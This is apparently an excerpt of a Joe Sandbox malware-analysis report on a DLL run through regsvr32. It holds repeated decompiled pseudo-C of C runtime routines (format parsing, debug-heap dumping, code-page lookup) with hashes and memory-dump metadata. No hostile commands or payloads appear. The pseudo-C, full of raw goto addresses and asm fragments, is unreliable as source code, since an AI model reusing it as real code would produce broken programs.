                                				_a88 = E000007FE7FEF9D31E40(_t191);
                                				if (_a88 >= 0) goto 0xf9d3dd6a;
                                				_a80 = _a80 | 0x00000004;
                                				_a88 =  ~_a88;
                                				goto 0xf9d3dd83;
                                				_a88 = _t171 + _t191 - 0x30;
                                				_a116 = 0;
                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                				_t192 =  &_a1560;
                                				_a116 = E000007FE7FEF9D31E40(_t192);
                                				if (_a116 >= 0) goto 0xf9d3ddc2;
                                				_a116 = 0xffffffff;
                                				goto 0xf9d3dddb;
                                				_a116 = _t171 + _t192 - 0x30;
                                				_a1408 = _a1208 & 0x0000ffff;
                                				if (_a1408 == 0x49) goto 0xf9d3de66;
                                				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                				goto 0xf9d3df88;
                                				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                				_a1544 =  &(_a1544[1]);
                                				asm("bts eax, 0xc");
                                				goto 0xf9d3de61;
                                				_a80 = _a80 | 0x00000010;
                                				goto 0xf9d3df88;
                                				asm("bts eax, 0xf");
                                				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                				_a1544 =  &(_a1544[2]);
                                				asm("bts eax, 0xf");
                                				goto 0xf9d3df6d;
                                				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                				_a1544 =  &(_a1544[2]);
                                				asm("btr eax, 0xf");
                                				goto 0xf9d3df6d;
                                				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                				goto 0xf9d3df6d;
                                				_a1216 = 0;
                                				goto E000007FE7FEF9D3DC41;
                                				goto 0xf9d3df88;
                                				_a80 = _a80 | 0x00000020;
                                				goto 0xf9d3df88;
                                				asm("bts eax, 0xb");
                                				_a1412 = _a1208 & 0x0000ffff;
                                				_a1412 = _a1412 - 0x41;
                                				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                				goto __rax;
                                			}






                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$0$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 530996419-1247675978
                                • Opcode ID: f21bac4cf66fd83060826b10cda673f64da0b58cdc9b26c9e440e84a16dbb144
                                • Instruction ID: f27db2fcef6f8d513c01393a57896d629d62aa2ad95cdf3e250bd1829576e434
                                • Opcode Fuzzy Hash: f21bac4cf66fd83060826b10cda673f64da0b58cdc9b26c9e440e84a16dbb144
                                • Instruction Fuzzy Hash: FA510CB2A0C6C28AE7B09B64E8407BEB7E0F385346F600125D6CA869A8D77DE444DF10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 26%
                                			E000007FE7FEF9D3BD82(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                				void* _t139;
                                				char* _t159;
                                				char* _t160;
                                
                                				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                				_t159 =  &_a1112;
                                				_a88 = E000007FE7FEF9D31E40(_t159);
                                				if (_a88 >= 0) goto 0xf9d3bdbc;
                                				_a80 = _a80 | 0x00000004;
                                				_a88 =  ~_a88;
                                				goto 0xf9d3bdd5;
                                				_a88 = _t139 + _t159 - 0x30;
                                				_a116 = 0;
                                				if (_a696 != 0x2a) goto 0xf9d3be16;
                                				_t160 =  &_a1112;
                                				_a116 = E000007FE7FEF9D31E40(_t160);
                                				if (_a116 >= 0) goto 0xf9d3be14;
                                				_a116 = 0xffffffff;
                                				goto 0xf9d3be2d;
                                				_a116 = _t139 + _t160 - 0x30;
                                				_a972 = _a696 & 0x000000ff;
                                				if (_a972 == 0x49) goto 0xf9d3beb7;
                                				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                				if (_a972 == 0x6c) goto 0xf9d3be76;
                                				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                				goto 0xf9d3bfd9;
                                				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                				_a1096 = _a1096 + 1;
                                				asm("bts eax, 0xc");
                                				goto 0xf9d3beb2;
                                				_a80 = _a80 | 0x00000010;
                                				goto 0xf9d3bfd9;
                                				asm("bts eax, 0xf");
                                				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                				_a1096 = _a1096 + 2;
                                				asm("bts eax, 0xf");
                                				goto 0xf9d3bfbe;
                                				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                				_a1096 = _a1096 + 2;
                                				asm("btr eax, 0xf");
                                				goto 0xf9d3bfbe;
                                				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                				goto 0xf9d3bfbe;
                                				_a704 = 0;
                                				goto E000007FE7FEF9D3BB66;
                                				goto 0xf9d3bfd9;
                                				_a80 = _a80 | 0x00000020;
                                				goto 0xf9d3bfd9;
                                				asm("bts eax, 0xb");
                                				_a976 = _a696;
                                				_a976 = _a976 - 0x41;
                                				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                				goto __rax;
                                			}






                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2576288505-192189897
                                • Opcode ID: 642eb86adef82c061240f963ecada7643a5a14508ef6930c6b5b5b901d4a1b0a
                                • Instruction ID: e5e15c00c08c12f84a3dc3260eb1d354ac6b745d6778a8e2653f024642a32d0f
                                • Opcode Fuzzy Hash: 642eb86adef82c061240f963ecada7643a5a14508ef6930c6b5b5b901d4a1b0a
                                • Instruction Fuzzy Hash: 0D515E72A0D6C28AE7F0DB24E8947BEBBE4E384355F600126D2CD869A9DB7DD541CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 26%
                                			E000007FE7FEF9D3DD30(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                				void* _t139;
                                				char* _t159;
                                				char* _t160;
                                
                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                				_t159 =  &_a1560;
                                				_a88 = E000007FE7FEF9D31E40(_t159);
                                				if (_a88 >= 0) goto 0xf9d3dd6a;
                                				_a80 = _a80 | 0x00000004;
                                				_a88 =  ~_a88;
                                				goto 0xf9d3dd83;
                                				_a88 = _t139 + _t159 - 0x30;
                                				_a116 = 0;
                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                				_t160 =  &_a1560;
                                				_a116 = E000007FE7FEF9D31E40(_t160);
                                				if (_a116 >= 0) goto 0xf9d3ddc2;
                                				_a116 = 0xffffffff;
                                				goto 0xf9d3dddb;
                                				_a116 = _t139 + _t160 - 0x30;
                                				_a1408 = _a1208 & 0x0000ffff;
                                				if (_a1408 == 0x49) goto 0xf9d3de66;
                                				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                				goto 0xf9d3df88;
                                				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                				_a1544 =  &(_a1544[1]);
                                				asm("bts eax, 0xc");
                                				goto 0xf9d3de61;
                                				_a80 = _a80 | 0x00000010;
                                				goto 0xf9d3df88;
                                				asm("bts eax, 0xf");
                                				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                				_a1544 =  &(_a1544[2]);
                                				asm("bts eax, 0xf");
                                				goto 0xf9d3df6d;
                                				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                				_a1544 =  &(_a1544[2]);
                                				asm("btr eax, 0xf");
                                				goto 0xf9d3df6d;
                                				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                				goto 0xf9d3df6d;
                                				_a1216 = 0;
                                				goto E000007FE7FEF9D3DC41;
                                				goto 0xf9d3df88;
                                				_a80 = _a80 | 0x00000020;
                                				goto 0xf9d3df88;
                                				asm("bts eax, 0xb");
                                				_a1412 = _a1208 & 0x0000ffff;
                                				_a1412 = _a1412 - 0x41;
                                				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                				goto __rax;
                                			}






                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2576288505-734865713
                                • Opcode ID: 84afe223306fb715127401468d722999f495e1b64e531eed53167a130bda57e2
                                • Instruction ID: 8bcff37972761654e6234074656759b20f0543a56075d35ebc75ec1029b84271
                                • Opcode Fuzzy Hash: 84afe223306fb715127401468d722999f495e1b64e531eed53167a130bda57e2
                                • Instruction Fuzzy Hash: 0451FCB2A0C6C28AE7B09B64E8407BEB7E4F394346F600125E6C9879A9D77DD445CF14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 24%
                                			E000007FE7FEF9D3BDE7(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                				void* _t113;
                                				char* _t133;
                                
                                				if (_a696 != 0x2a) goto 0xf9d3be16;
                                				_t133 =  &_a1112;
                                				_a116 = E000007FE7FEF9D31E40(_t133);
                                				if (_a116 >= 0) goto 0xf9d3be14;
                                				_a116 = 0xffffffff;
                                				goto 0xf9d3be2d;
                                				_a116 = _t113 + _t133 - 0x30;
                                				_a972 = _a696 & 0x000000ff;
                                				if (_a972 == 0x49) goto 0xf9d3beb7;
                                				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                				if (_a972 == 0x6c) goto 0xf9d3be76;
                                				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                				goto 0xf9d3bfd9;
                                				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                				_a1096 = _a1096 + 1;
                                				asm("bts eax, 0xc");
                                				goto 0xf9d3beb2;
                                				_a80 = _a80 | 0x00000010;
                                				goto 0xf9d3bfd9;
                                				asm("bts eax, 0xf");
                                				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                				_a1096 = _a1096 + 2;
                                				asm("bts eax, 0xf");
                                				goto 0xf9d3bfbe;
                                				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                				_a1096 = _a1096 + 2;
                                				asm("btr eax, 0xf");
                                				goto 0xf9d3bfbe;
                                				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                				goto 0xf9d3bfbe;
                                				_a704 = 0;
                                				goto E000007FE7FEF9D3BB66;
                                				goto 0xf9d3bfd9;
                                				_a80 = _a80 | 0x00000020;
                                				goto 0xf9d3bfd9;
                                				asm("bts eax, 0xb");
                                				_a976 = _a696;
                                				_a976 = _a976 - 0x41;
                                				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                				goto __rax;
                                			}






                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2576288505-192189897
                                • Opcode ID: 9b0d14d024408deea39e0a17da6f412b88ec8238870ee572ebff0cd3a83ccddf
                                • Instruction ID: ff5535f435e3edde8ece23b3de1a4987682526c6b5e3102cfdc31443931d3947
                                • Opcode Fuzzy Hash: 9b0d14d024408deea39e0a17da6f412b88ec8238870ee572ebff0cd3a83ccddf
                                • Instruction Fuzzy Hash: D9416B72A0DAC28AE3F0DB24E8947BEB7E4E380345F600126D2DD869A9DB3DD541CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 24%
                                			E000007FE7FEF9D3DD95(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                				void* _t113;
                                				char* _t133;
                                
                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                				_t133 =  &_a1560;
                                				_a116 = E000007FE7FEF9D31E40(_t133);
                                				if (_a116 >= 0) goto 0xf9d3ddc2;
                                				_a116 = 0xffffffff;
                                				goto 0xf9d3dddb;
                                				_a116 = _t113 + _t133 - 0x30;
                                				_a1408 = _a1208 & 0x0000ffff;
                                				if (_a1408 == 0x49) goto 0xf9d3de66;
                                				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                				goto 0xf9d3df88;
                                				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                				_a1544 =  &(_a1544[1]);
                                				asm("bts eax, 0xc");
                                				goto 0xf9d3de61;
                                				_a80 = _a80 | 0x00000010;
                                				goto 0xf9d3df88;
                                				asm("bts eax, 0xf");
                                				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                				_a1544 =  &(_a1544[2]);
                                				asm("bts eax, 0xf");
                                				goto 0xf9d3df6d;
                                				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                				_a1544 =  &(_a1544[2]);
                                				asm("btr eax, 0xf");
                                				goto 0xf9d3df6d;
                                				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                				goto 0xf9d3df6d;
                                				_a1216 = 0;
                                				goto E000007FE7FEF9D3DC41;
                                				goto 0xf9d3df88;
                                				_a80 = _a80 | 0x00000020;
                                				goto 0xf9d3df88;
                                				asm("bts eax, 0xb");
                                				_a1412 = _a1208 & 0x0000ffff;
                                				_a1412 = _a1412 - 0x41;
                                				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                				goto __rax;
                                			}






                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2576288505-734865713
                                • Opcode ID: e93e5a5da9d23810187a949f5699427fbde4a421f2c98764f5e18462d0498a04
                                • Instruction ID: 23759b0de1675013ddf4d03c0cfaf8b870fc7ca6517f58e2c4ab95e624369fc8
                                • Opcode Fuzzy Hash: e93e5a5da9d23810187a949f5699427fbde4a421f2c98764f5e18462d0498a04
                                • Instruction Fuzzy Hash: E5415EB2A0C6C28AE7F09B64E8407BE72E4F384746F600125D6C9875E9DB3DD445CF14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invoke_watson_if_oneof_swprintf_p
                                • String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                • API String ID: 2731067127-3604075083
                                • Opcode ID: a5e89465a157929821ec7ea19f55365b45851ed2ed8ce63167a36004212f5177
                                • Instruction ID: 5622a3d1d015b06430e144c3880eb2afd9b3a378503d823bdd7d048160e8afa8
                                • Opcode Fuzzy Hash: a5e89465a157929821ec7ea19f55365b45851ed2ed8ce63167a36004212f5177
                                • Instruction Fuzzy Hash: BB413C72A0D7C186E7A49B51E8907AEBBA1F784740FA14126D6CD47BA9DB3ED404CF10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 41%
                                			E000007FE7FEF9D34F20(long long __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24, signed int _a32) {
                                				void* _v16;
                                				long long _v24;
                                				long long _v32;
                                				long long _v40;
                                				long long _v48;
                                				void* _v56;
                                				signed int _v72;
                                				long long _v80;
                                				signed int _v88;
                                				void* _t88;
                                				void* _t89;
                                				void* _t90;
                                				void* _t92;
                                				void* _t93;
                                				void* _t101;
                                				long long _t113;
                                				intOrPtr _t116;
                                				void* _t117;
                                				long long _t118;
                                				long long _t121;
                                				long long _t122;
                                				long long _t125;
                                				void* _t164;
                                
                                				_t113 = __rax;
                                				_a32 = r9d;
                                				_a24 = __r8;
                                				_a16 = __rdx;
                                				_a8 = __rcx;
                                				_v88 = E000007FE7FEF9D33B70(_a8, _a16, _a24);
                                				E000007FE7FEF9D2E680(_t79, _t113);
                                				_v80 = _t113;
                                				0xf9d24000();
                                				_v56 = _t113 + 0x100;
                                				 *_v56 =  *_v56 + 1;
                                				if (_v88 == 0xffffffff) goto 0xf9d35103;
                                				if (_v88 - _a32 <= 0) goto 0xf9d35103;
                                				if (_v88 - 0xffffffff <= 0) goto 0xf9d34fb9;
                                				_t116 = _a24;
                                				if (_v88 -  *((intOrPtr*)(_t116 + 4)) >= 0) goto 0xf9d34fb9;
                                				goto 0xf9d34fbe;
                                				E000007FE7FEF9D2E680(E000007FE7FEF9D2CF80(_t116), _t116);
                                				_t117 = _t116 +  *((intOrPtr*)(_a24 + 8));
                                				_v72 =  *((intOrPtr*)(_t117 + _v88 * 8));
                                				_t88 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t117 + _v88 * 8)), _t117);
                                				_t118 = _t117 +  *((intOrPtr*)(_a24 + 8));
                                				if ( *((intOrPtr*)(_t118 + 4 + _v88 * 8)) == 0) goto 0xf9d35038;
                                				_t89 = E000007FE7FEF9D2E680(_t88, _t118);
                                				_v48 = _t118;
                                				_t90 = E000007FE7FEF9D2E680(_t89, _t118);
                                				_t121 = _v48 +  *((intOrPtr*)(_t118 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
                                				_v40 = _t121;
                                				goto 0xf9d35041;
                                				_v40 = 0;
                                				if (_v40 == 0) goto 0xf9d350f4;
                                				r9d = _v72;
                                				_t92 = E000007FE7FEF9D2E680(E000007FE7FEF9D33BD0(_t90, _a8, _a16, _a24), _t121);
                                				_t122 = _t121 +  *((intOrPtr*)(_a24 + 8));
                                				if ( *((intOrPtr*)(_t122 + 4 + _v88 * 8)) == 0) goto 0xf9d350c9;
                                				_t93 = E000007FE7FEF9D2E680(_t92, _t122);
                                				_v32 = _t122;
                                				E000007FE7FEF9D2E680(_t93, _t122);
                                				_t125 = _v32 +  *((intOrPtr*)(_t122 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
                                				_v24 = _t125;
                                				goto 0xf9d350d2;
                                				_v24 = 0;
                                				r8d = 0x103;
                                				E000007FE7FEF9D2E6C0(E000007FE7FEF9D3D7E0(_v24, _a8, _t164), _t125, _v80);
                                				goto 0xf9d350f6;
                                				_v88 = _v72;
                                				goto 0xf9d34f83;
                                				0xf9d24000();
                                				if ( *((intOrPtr*)(_t125 + 0x100)) <= 0) goto 0xf9d35131;
                                				0xf9d24000();
                                				_v16 = _t125 + 0x100;
                                				 *_v16 =  *_v16 - 1;
                                				if (_v88 == 0xffffffff) goto 0xf9d3514a;
                                				if (_v88 - _a32 <= 0) goto 0xf9d3514a;
                                				_t101 = E000007FE7FEF9D2CF80(_v16);
                                				r9d = _v88;
                                				return E000007FE7FEF9D33BD0(_t101, _a8, _a16, _a24);
                                			}



























                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: State$_inconsistency$BaseControlCurrentFromImage
                                • String ID:
                                • API String ID: 2452617236-0
                                • Opcode ID: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                • Instruction ID: 79c6626e7a9320abdad6ed0e53fbdedc274fcc22452831ee93149e628ab3cd95
                                • Opcode Fuzzy Hash: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                • Instruction Fuzzy Hash: EC61F132A0DA8586DAB0DB55E45177EB3A0F7C4789F214625E6CD83B6ACB3ED441CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 27%
                                			E000007FE7FEF9D29F20(intOrPtr __ecx, intOrPtr* __rax, intOrPtr _a8) {
                                				long long _v16;
                                				intOrPtr _v20;
                                				intOrPtr _v24;
                                				int _v28;
                                				int _v32;
                                				char _v64;
                                				long long _v72;
                                				intOrPtr _t29;
                                				intOrPtr* _t41;
                                
                                				_t41 = __rax;
                                				_a8 = __ecx;
                                				_v16 = 0xfffffffe;
                                				_v72 = 0;
                                				0xf9d266b0();
                                				 *0xf9d4cd68 = 0;
                                				if (_a8 != 0xfffffffe) goto 0xf9d29f81;
                                				 *0xf9d4cd68 = 1;
                                				_v32 = GetOEMCP();
                                				E000007FE7FEF9D26800( &_v64);
                                				goto 0xf9d29fe3;
                                				if (_a8 != 0xfffffffd) goto 0xf9d29fae;
                                				 *0xf9d4cd68 = 1;
                                				_v28 = GetACP();
                                				E000007FE7FEF9D26800( &_v64);
                                				_t29 = _v28;
                                				goto 0xf9d29fe3;
                                				if (_a8 != 0xfffffffc) goto 0xf9d29fe3;
                                				 *0xf9d4cd68 = 1;
                                				E000007FE7FEF9D26840(_t29,  &_v64);
                                				_v24 =  *((intOrPtr*)( *_t41 + 4));
                                				E000007FE7FEF9D26800( &_v64);
                                				goto 0xf9d29ff9;
                                				_v20 = _a8;
                                				E000007FE7FEF9D26800( &_v64);
                                				return _v20;
                                			}













                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
